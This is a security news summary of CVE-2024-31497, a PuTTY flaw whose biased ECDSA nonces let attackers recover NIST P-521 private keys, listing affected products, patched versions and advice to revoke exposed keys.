cyware: Widely-Used PuTTY SSH Client Found Vulnerable to Key Recovery Attack

Summary: The PuTTY SSH and Telnet client has a critical vulnerability that could allow attackers to recover private keys and forge signatures, impacting various software products that incorporate PuTTY.

Threat Actor: Unknown | PuTTY
Victim: Users of PuTTY and other software products that incorporate a vulnerable version of PuTTY

Key Point :

  • The PuTTY Secure Shell (SSH) and Telnet client has a critical vulnerability that could be exploited to recover NIST P-521 private keys and forge signatures.
  • The flaw is due to the generation of biased ECDSA cryptographic nonces, allowing for the recovery of the private key in approximately 60 signatures.
  • Other software products that incorporate a vulnerable version of PuTTY, such as FileZilla, WinSCP, TortoiseGit, and TortoiseSVN, are also affected.
  • The issue has been addressed in the latest versions of PuTTY, FileZilla, WinSCP, and TortoiseGit, and users of TortoiseSVN are advised to use Plink from the latest PuTTY release until a patch is available.
  • ECDSA NIST-P521 keys used with any of the affected components should be considered compromised and revoked.
PuTTY SSH Client

The maintainers of the PuTTY Secure Shell (SSH) and Telnet client are alerting users of a critical vulnerability impacting versions from 0.68 through 0.80 that could be exploited to achieve full recovery of NIST P-521 (ecdsa-sha2-nistp521) private keys.

The flaw has been assigned the CVE identifier CVE-2024-31497, with the discovery credited to researchers Fabian Bäumer and Marcus Brinkmann of the Ruhr University Bochum.

“The effect of the vulnerability is to compromise the private key,” the PuTTY project said in an advisory.

“An attacker in possession of a few dozen signed messages and the public key has enough information to recover the private key, and then forge signatures as if they were from you, allowing them to (for instance) log in to any servers you use that key for.”

Cybersecurity

However, in order to obtain the signatures, an attacker will have to compromise the server for which the key is used to authenticate to.

In a message posted on the Open Source Software Security (oss-sec) mailing list, Bäumer described the flaw as stemming from the generation of biased ECDSA cryptographic nonces, which could enable the recovery of the private key.

“The first 9 bits of each ECDSA nonce are zero,” Bäumer explained. “This allows for full secret key recovery in roughly 60 signatures by using state-of-the-art techniques.”

“These signatures can either be harvested by a malicious server (man-in-the-middle attacks are not possible given that clients do not transmit their signature in the clear) or from any other source, e.g. signed git commits through forwarded agents.”

Besides impacting PuTTY, it also affects other products that incorporate a vulnerable version of the software –

  • FileZilla (3.24.1 – 3.66.5)
  • WinSCP (5.9.5 – 6.3.2)
  • TortoiseGit (2.4.0.2 – 2.15.0)
  • TortoiseSVN (1.10.0 – 1.14.6)
Cybersecurity

Following responsible disclosure, the issue has been addressed in PuTTY 0.81, FileZilla 3.67.0, WinSCP 6.3.3, and TortoiseGit 2.15.0.1. Users of TortoiseSVN are recommended to use Plink from the latest PuTTY 0.81 release when accessing an SVN repository via SSH until a patch becomes available.

Specifically, it has been resolved by switching to the RFC 6979 technique for all DSA and ECDSA key types, abandoning its earlier method of deriving the nonce using a deterministic approach that, while avoiding the need for a source of high-quality randomness, was susceptible to biased nonces when using P-521.

On top of that, ECDSA NIST-P521 keys used with any of the vulnerable components should be considered compromised and consequently revoked by removing them from authorized_keys files files and their equivalents in other SSH servers.

Source: https://thehackernews.com/2024/04/widely-used-putty-ssh-client-found.html


“An interesting youtube video that may be related to the article above”